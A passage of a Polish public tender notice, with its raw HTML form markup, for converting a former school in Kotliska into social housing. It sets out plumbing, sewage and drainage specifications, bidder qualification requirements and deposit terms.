obustronnie wyposażyć w zawory kulowe odcinające,- prowadzenie równolegle do siebie rur ciepłej i zimnej wody, w warstwach podłogowych (parter budynku szkoły oraz budynek gospodarczy) oraz bruzdach ściennych,- mocowanie rur prowadzonych w warstwach podłogowych i bruzdach ściennych do konstrukcji za pomocą obejm z tworzywa,- izolowanie rur zimnej wody oraz ciepłej w warstwach podłogowych otulinami ze spienionej pianki polietylenowej grubości 6 mm, - izolowanie rur ciepłej wody otulinami ze spienionej pianki polietylenowej o grubościach:- 20 mm dla rur o średnicy wewnętrznej do 22 mm,W przypadku prowadzenia przewodów w przegrodach pomiędzy pomieszczeniami ogrzewanymi grubość izolacji powinna wynosić 50% grubości podanej wyżej.- wykonanie przed zakryciem instalacji wodociągowej przepłukania i poddania próbie szczelności wodą zimną.Pogrzewacz:- pojemnościowy o pojemności 80 l wody,- zasilany z kuchni węglowej wyposażony dodatkowo w grzałkę elektryczną,- zasobnik ciepłej wody na zasilaniu zimną wodą zabezpieczyć należy zaworem bezpieczeństwa 1/2", do = 12 mm, - wylot zaworu podłączyć wężykiem elastycznym do kanalizacji sanitarnej oraz przeponowym naczyniem wzbiorczym do wody pitnej o pojemności 8 l,- armatura odcinająca - zawory kulowe gwintowane (na przewodach wody ciepłej PN10, 120°C).Kanalizacja sanitarna:- odprowadzanie ścieków sanitarnych do przydomowej oczyszczalni ścieków,- wykonanie instalacji kanalizacyjnej z rur i kształtek kielichowych z PP oraz PCV, uszczelnionych za pomocą systemowych uszczelek gumowych,- prowadzenie podejść w bruzdach ze spadkiem min. 2%. Miejsce prowadzenia rur kanalizacyjnych w bruzdach wzmocnić siatką tynkarską szerokości 25 cm,- wyprowadzenie pionu kanalizacyjnego ponad dach i zakończenie rurą wywiewną, - na pionie możliwie najniżej umieścić rewizję,- wykonanie na przewodach pionowych na każdej kondygnacji co najmniej jedno mocowanie stałe zapewniające przenoszenie obciążeń rurociągów i jedno mocowanie przesuwne,- niezależne mocowanie wszystkich elementów przewodów spustowych,- wykonanie poziomych przewodów odpływowych z rur o sztywności obwodowej i prowadzenie ich w obrębie budynku pod posadzką parteru - układać na podsypce z piasku gr. 15 cm. Przykrycie przewodów powinno wynosić min. 50 cm poniżej podłogi,- instalacje kanalizacyjną po wykonaniu poddać próbie szczelności.Instalacje elektryczne:Projekt obejmuje wnętrzowe instalacje elektryczne i teletechniczne dla budynków wielorodzinnych z lokalami socjalnymi, a w szczególności:- rozdzielnice główne licznikowe każdego z budynków,- wewnętrzne linie zasilające,- rozdzielnice mieszkaniowe niskiego napięcia,- instalacje odbiorcze oświetlenia podstawowego,- instalacje odbiorcze gniazd wtykowych ogólnodostępnych i dedykowanych,- instalacje odbiorcze urządzeń technologicznych,- instalację odgromową i uziemiającą,w tym instalacje ochronne i przeciwporażeniowe.1.2.16. Przyłącze wodociągowePrzebudowa przyłącza:- z rur polietylenowych PEHD PE80 SDR13,6 PN10 De50 w wykonaniu do wody pitnej (niebieskie),- wykonanie zmiany kierunku trasy przy pomocy łuków giętych wykorzystując elastyczność rur z PE (promień gięcia uzależniony jest od średnicy rur),- w przypadku, gdy warunki terenowe nie pozwalają na zastosowanie łuków giętych, należy zastosować odpowiednie kształtki systemowe a łączenia wykonać poprzez zgrzewanie, - połączenie projektowanego przyłącza z siecią wodociągową za pomocą opaski do nawiercania i zasuwy do przyłączy domowych,- zakończenie przyłącza w studni wodomierzowej systemowej małogabarytowej bez dna o średnicy DN600z zestawem wodomierzowym, w którego skład wchodzą zawór odcinający DN32, wodomierz DN25 qn=6,3 m3/h, zawór odcinający DN32, zawór antyskażeniowy EA DN32,- ułożenie w odległości 0,3÷0,4 m nad rurą niebiesko-białą taśmę sygnalizacyjno-ostrzegawczą z wtopionym drutem sygnalizacyjnym o szerokości minimum równej średnicy rurociągu.Zasuwa- wyposażona w teleskopowe przedłużenie wrzeciona,- wyposażona w skrzynkę uliczną (z tworzywa sztucznego - na terenach zielonych, żeliwną typu ciężkiego - na drogach),- zabezpieczenie skrzynki ulicznej przed osiadaniem przez posadowienie na płytach podkładowych pod skrzynki uliczne,- umieszczenie tabliczki określającą lokalizację zasuw w pobliżu zasuwy na ogrodzeniu lub słupku betonowym.- wykonanie prób szczelności.Projektowane przyłącze wodociągowe:- z rur polietylenowych PEHD PE80 SDR13,6 PN10 De40 w wykonaniu do wody pitnej (niebieskie), - wykonanie zmiany kierunku trasy przy pomocy łuków giętych wykorzystując elastyczność rur z PE (promień gięcia uzależniony jest od średnicy rur),- w przypadku, gdy warunki terenowe nie pozwalają na zastosowanie łuków giętych, należy zastosować odpowiednie kształtki systemowe a łączenia wykonać poprzez zgrzewanie, - połączenie projektowanego przyłącza z siecią wodociągową za pomocą opaski do nawiercania i zasuwy do przyłączy domowych,- zakończenie przyłącza w projektowanym budynku zestawem wodomierzowym, umieszczonym na wysokości 0,4÷1,0 m, w którego skład wchodzą zawór odcinający DN32, wodomierz DN20 qn=2,5 m3/h, zawór odcinający DN32, zawór antyskażeniowy EA DN32, filtr skośny DN32 zawór odcinający z kurkiem spustowym DN32,- ułożenie w odległości 0,3÷0,4 m nad rurą niebiesko-białą taśmę sygnalizacyjno-ostrzegawczą z wtopionym drutem sygnalizacyjnym o szerokości minimum równej średnicy rurociągu.Zasuwa- wyposażona w teleskopowe przedłużenie wrzeciona,- wyposażona w skrzynkę uliczną (z tworzywa sztucznego - na terenach zielonych, żeliwną typu ciężkiego - na drogach),- zabezpieczenie skrzynki ulicznej przed osiadaniem przez posadowienie na płytach podkładowych pod skrzynki uliczne,- umieszczenie tabliczki określającą lokalizację zasuw w pobliżu zasuwy na ogrodzeniu lub słupku betonowym.- wykonanie prób szczelności.1.2.17. Przyłącze kanalizacji sanitarnej- z rur PVC-U SDR34 lite, łączonych kielichowo, przy pomocy systemowych uszczelek typu BL lub BL-fix, kielichami przeciwnie do kierunku przepływu,- wykonanie przejścia przyłącza przez ścianę zewnętrzną (pod fundamentami) w tulei ochronnej PE o dwa rozmiary większej od biegnącej w niej rury, rurę w tulei prowadzić na płozach dystansowych.- na trasie instalacji kanalizacyjnej na załamaniach i połączeniach zaprojektowano studzienki z tworzywa sztucznego DN600 oraz z prefabrykowanych kręgów betonowych DN1000 wyposażone we właz żeliwny klasy A15 - tereny zielone.Montaż i wykonanie oczyszczalniW skład oczyszczalni wchodzą:- instalacja kanalizacyjna w budynkach podłączona do oczyszczalni ścieków stanowiąca źródło ściekówi jednocześnie odpowietrzenie oczyszczalni w związku z powyższym przynajmniej jeden pion kanalizacyjny o średnicy min. DN110 w budynku należy wyprowadzić ponad dach budynku, co najmniej 0,6 m powyżej górnej krawędzi okien i drzwi zewnętrznych w budynku,- biologiczna oczyszczalnia ścieków o przepustowości 8,0 m3/h,- studnia chłonna - z prefabrykowanych kręgów betonowych DN1000. Dno studni chłonnej stanowić powinien zagęszczony żwir płukany frakcja 16-32 mm gr. min. 50 cm.- przy wykonywaniu oczyszczalni zachować minimalne odległości innych obiektów budowlanych:osadnika gnilnego:- od studni stanowiącej ujęcie wody pitnej - min. 15 m,- od granicy działki, drogi publicznej lub chodnika przy ulicy - min. 2 m.drenażu studni chłonnej:- od poziomu wód gruntowych - min. 1,5 m,- od studni stanowiącej ujęcie wody pitnej - min. 70 m,- od granicy działki, drogi publicznej lub chodnika przy ulicy - min. 2 m,- od budynków mieszkalnych - min. 5 m,- od rurociągów gazowych i wodociągowych - min. 1,5 m,- od kabli elektrycznych - min. 0,8 m,- od kabli telekomunikacyjnych - min. 0,5 m.- montaż studzienek z tworzyw sztucznych i rur- montaż studzienek kanalizacyjnych prefabrykowanych betonowych,- montaż zbiornika oczyszczalni,- próby szczelności i odbiór kanałów.1.2.18.	Kanalizacja deszczowa- z rur PVC-U SDR34 lite, łączonych kielichowo, przy pomocy systemowych uszczelek typu BL lub BL-fix, kielichami przeciwnie do kierunku przepływu,- na trasie instalacji kanalizacyjnej na załamaniach i połączeniach zaprojektowano studzienki z tworzywa sztucznego DN600 oraz z prefabrykowanych kręgów betonowych DN800 wyposażone we właz żeliwny klasy A15 - tereny zielone oraz klasy D400 - drogi, parkingi,- odprowadzanie wód deszczowych i roztopowych do projektowanej studni chłonnej z prefabrykowanych kręgów betonowych DN1000 - komin złazowy, DN2000 - komora chłonna,- dno studni chłonnej - zagęszczony żwir płukany frakcja 16-32 mm gr. min. 50 cm,- rury spustowe wyposażyć w czyszczaki umieszczone na wysokości 0,5 m nad poziomem terenu.- montaż studzienek z tworzyw sztucznych i rur- montaż studzienki kanalizacyjnej prefabrykowanej betonowej,- próby szczelności i odbiór kanałów.1.2.19.	Wiata śmietnikowa- wykonanie żelbetowych stóp fundamentowych wylewanych na mokro z betonu, zbrojone stalą,- konstrukcja wiaty - słupki stalowe z RK 100x4mm ocynkowanej ogniowo, wypełnione siatką panelową.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45210000-2</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45110000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45111200-0</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>44112410-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45261000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262600-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45400000-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45443000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331100-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45332400-7</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45331210-1</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45310000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>31321000-2</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45440000-3</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45450000-6</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach"></span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia">2019-11-30</span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Nie dotyczy.</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże, że: - jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę min. 500 000,00 zł (słownie zł: pięćset tysięcy);- posiada środki finansowe lub zdolność kredytową, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert na kwotę nie mniejszą niż 300 000,00 zł (słownie zł: trzysta tysięcy).</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">Wykonawca spełni warunek jeżeli wykaże, że:- dysponuje osobą pełniącą funkcję Kierownika budowy stosownie do przepisów ustawy Prawo Budowlane, posiadającą wykształcenie techniczne i uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno - budowlanej bez ograniczeń, będącą członkiem właściwej terytorialnie Izby Inżynierów Budownictwa,- dysponuje co najmniej jedną osobą pełniącą funkcję kierownika robót instalacji sanitarnej stosownie do przepisów ustawy Prawo Budowlane, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowychi kanalizacyjnych bez ograniczeń oraz będącą członkiem właściwej terytorialnie Izby Inżynierów,- dysponuje co najmniej jedną osobą pełniącą funkcję kierownika robót elektrycznych stosownie do przepisów ustawy Prawo Budowlane, posiadającą uprawnienia budowlane do kierowania robotami w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń oraz będącą członkiem właściwej terytorialnie Izby Inżynierów,Zamawiający, określając wymogi dla każdej osoby w zakresie posiadanych uprawnień budowlanych, dopuszcza odpowiadające im uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo budowlane (tj. Dz.U.2016.290 z późn. zm.) oraz Ustawy z dnia 22.12.2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U.2016.65).- w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, przed upływem terminu składania ofert wykonał należycie co najmniej jedno zamówienie, których przedmiotem była budowa, rozbudowa, przebudowa, remont lub modernizacja budynku mieszkalnego wielorodzinnego obejmującego minimum 4 mieszkania o łącznej powierzchni użytkowej nie mniejszej niż 250 m2, o wartości robót co najmniej 500 000,00 złotych brutto</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Tak</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 8 ustawy Pzp)</span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_niepodleganiu_wykluczenia">Tak</span> <br/> <b> Oświadczenie o spełnianiu kryteriów selekcji </b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_oswiadczenie_spelnienie_kryteriow">Nie</span> </div> <b> III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP: </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_dokumentow_zaswiadczen">1. Odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 Ustawy - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.2. zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu; 3. zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.</span> </div> <b> III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_warunkow_udzialu">1. Wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz których roboty te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały wykonane należycie, w szczególności informacji o tym czy roboty zostały wykonane zgodnie z przepisami prawa budowlanego i prawidłowo ukończone - zgodnie z treścią Załącznika nr 2 do SIWZ;Dowodami, o których mowa są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów - inne dokumenty.2. Dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego; 3. Wykaz osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacją na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacjąo podstawie do dysponowania tymi osobami - zgodnie z treścią Załącznika nr 3 do SIWZ;4. Informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy,w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania ofert.</span> <br/> <b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zakresie_kryteriow_selekcji"></span> </div> <b> III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_wykaz_potwierdzenie_okolicznosci"></span> </div> <b> III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6) </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_niewymienione">1) Pełnomocnictwo złożone w formie oryginału lub kopii poświadczonej notarialnie: a) W przypadku podpisywania oferty przez osoby nie wymienione w odpisie z właściwego rejestru - pełnomocnictwo do podpisania oferty lub podpisania oferty i zawarcia umowy; b) W przypadku podmiotów występujących wspólnie pełnomocnictwo podpisane przez upoważnionych przedstawicieli każdego z podmiotów występujących wspólnie, do reprezentowania w postępowaniu (zgodnie z art. 23 ustawy Pzp). 2) Zobowiązanie innego podmiotu, na zasobach którego polega Wykonawca, do oddania do dyspozycji Wykonawcy niezbędnych zasobów na potrzeby realizacji zamówienia. 3)Lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. 2017. 229 z późn zm.) albo informacji o tym, że nie należy do grupy kapitałowej, o której mowa w art.24.ust.1 23 ustawy Pzp. 4) Oświadczenie dot. RODO.</span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA IV: PROCEDURA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>IV.1) OPIS </b> <br/> <b>IV.1.1) Tryb udzielenia zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_tryb_udzielenia_zamowienia">Przetarg nieograniczony</span> <br/> <b>IV.1.2) Zamawiający żąda wniesienia wadium:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wadium">Tak</span> <br/> Informacja na temat wadium <br/> <span id="ctl00_ContentPlaceHolder1_wadium">Warunkiem udziału w przetargu jest wniesienie wadium w wysokości 30 000,00 zł (słownie: trzydzieści tysięcy złotych).Wadium może być wnoszone w następujących formach: 1. Pieniądzu,2. Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,3. Gwarancjach bankowych,4. Gwarancjach ubezpieczeniowych,5. Poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2018r. poz. 110 ze zmianami).Wadium należy wnieść przed upływem terminu składania ofert, o którym mowa w pkt 16.1.1. SIWZ. Wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. Dołączenie do oferty kopii polecenia przelewu wystawionego przez Wykonawcę nie jest więc wystarczające do stwierdzenia przez Zamawiającego terminowego wniesienia wadium przez Wykonawcę.Wadium wnoszone w pieniądzu należy wpłacić przelewem na konto Zamawiającego nr 84 1020 2137 0000 9902 0134 9554, Powszechna Kasa Oszczędności Bank Polski Spółka Akcyjnaw Bolesławcu. Na przelewie należy umieścić informację: ,,Wadium - Adaptacja budynku po byłej szkole w Kotliskach na mieszkania socjalne".Wadium w formie innej niż pieniężna należy złożyć w siedzibie Zamawiającego: Urząd Gminyi Miasta Lwówek Śląski, Aleja Wojska Polskiego 25A, 59-600 Lwówek Śląski, Kasa - pokój nr 6, parter. Przy przekazaniu tych dokumentów osoba je składająca otrzyma odpowiednie potwierdzenie. Zamawiający dopuszcza złożenie wadium w formie innej niż pieniężna łączniez ofertą, tj. w tym samym opakowaniu.W przypadku składania przez Wykonawcę wadium w formie wskazanej w pkt 13.2.2. do 13.2.5., wadium powinno być sporządzone adekwatnie do formy, w której jest wnoszone i winno zawierać następujące elementy:Nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) lub poręczyciela oraz wskazanie ich siedzib, Określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem, Kwotę gwarancji lub poręczenia, Termin ważności wadium.W przypadku Konsorcjum w treści dokumentu należy zaznaczyć zapis, że dotyczy ona Konsorcjum.Zobowiązanie gwaranta/poręczyciela do: ,,zapłacenia kwoty wadium na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:1. Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a Ustawy,z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 Ustawy, oświadczenia,o którym mowa w art. 25a ust. 1 Ustawy, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której w art. 87 ust. 2 pkt 3, co spowodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej;Wykonawca, którego ofertę wybrano: 2.	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,3.	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,4.	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy".Zwrot wadium oraz sytuacja jego ewentualnego zatrzymania uregulowana jest w art. 46 Ustawy.</span> </div> <br/> <b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zaliczek">Nie</span> <br/> Należy podać informacje na temat udzielania zaliczek: <br/> <span id="ctl00_ContentPlaceHolder1_przewiduje_udzielenie_zaliczek"></span> </div> <br/> <b> IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_katalogow_elektronicznych">Nie</span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_zlozenie_katalogow_elektronicznych_informacje_dodatkowe"></span> </div> <br/> <b> IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span 